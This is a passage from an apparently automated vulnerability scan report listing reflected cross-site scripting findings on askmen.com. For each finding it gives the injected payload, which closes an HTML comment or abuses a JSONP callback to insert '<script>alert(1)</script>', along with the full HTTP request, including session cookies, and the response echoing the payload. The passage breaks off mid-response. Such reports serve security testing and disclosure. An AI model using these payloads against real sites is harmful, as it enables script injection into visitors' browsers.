Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload be4dc--><script>alert(1)</script>25fbaa2e8e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js/ambe4dc--><script>alert(1)</script>25fbaa2e8e2/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/js/ambe4dc--><script>alert(1)</script>25fbaa2e8e2/min.php/-->

1.130. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload f3612--><script>alert(1)</script>8774298ba9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js/am/min.phpf3612--><script>alert(1)</script>8774298ba9?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38687
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/js/am/min.phpf3612--><script>alert(1)</script>8774298ba9/-->

1.131. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 60e57--><script>alert(1)</script>03504e51112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes60e57--><script>alert(1)</script>03504e51112/views/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes60e57--><script>alert(1)</script>03504e51112/views/helpers/cache.php/-->

1.132. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bf1fd--><script>alert(1)</script>aef62cdb3b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/viewsbf1fd--><script>alert(1)</script>aef62cdb3b1/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/viewsbf1fd--><script>alert(1)</script>aef62cdb3b1/helpers/cache.php/-->

1.133. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload db6bc--><script>alert(1)</script>acf16507727 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/views/helpersdb6bc--><script>alert(1)</script>acf16507727/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/views/helpersdb6bc--><script>alert(1)</script>acf16507727/cache.php/-->

1.134. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 449be--><script>alert(1)</script>22759164fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/views/helpers/cache.php449be--><script>alert(1)</script>22759164fa?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38697
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/views/helpers/cache.php449be--><script>alert(1)</script>22759164fa/-->

1.135. http://www.askmen.com/includes/views/helpers/cache.php [jsoncallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload cd866<script>alert(1)</script>4845e0f9b68 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/views/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211cd866<script>alert(1)</script>4845e0f9b68&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Content-Length: 145
Content-Type: application/json; charset=utf-8
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
ServerHost: askmen-prod-web-app-05
AMCache: Hit
Expires: Tue, 04 Oct 2011 20:19:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:29 GMT
Connection: close

jQuery16109072330188937485_1317758932211cd866<script>alert(1)</script>4845e0f9b68({"4":43,"5":29,"0":14,"2":14,"1":0,"3":0,"total_reactions":7});

1.136. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7ba26--><script>alert(1)</script>e1deec8577f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_107ba26--><script>alert(1)</script>e1deec8577f/cars/fastest-cars-in-the-world.html HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38707
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : top_107ba26--><script>alert(1)</script>e1deec8577f/cars/fastest-cars-in-the-world.html-->

1.137. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d514b--><script>alert(1)</script>547716ebfec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_10/carsd514b--><script>alert(1)</script>547716ebfec/fastest-cars-in-the-world.html HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38707
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : top_10/carsd514b--><script>alert(1)</script>547716ebfec/fastest-cars-in-the-world.html-->

1.138. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5930d--><script>alert(1)</script>e54392f1e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_10/cars/fastest-cars-in-the-world.html5930d--><script>alert(1)</script>e54392f1e73 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
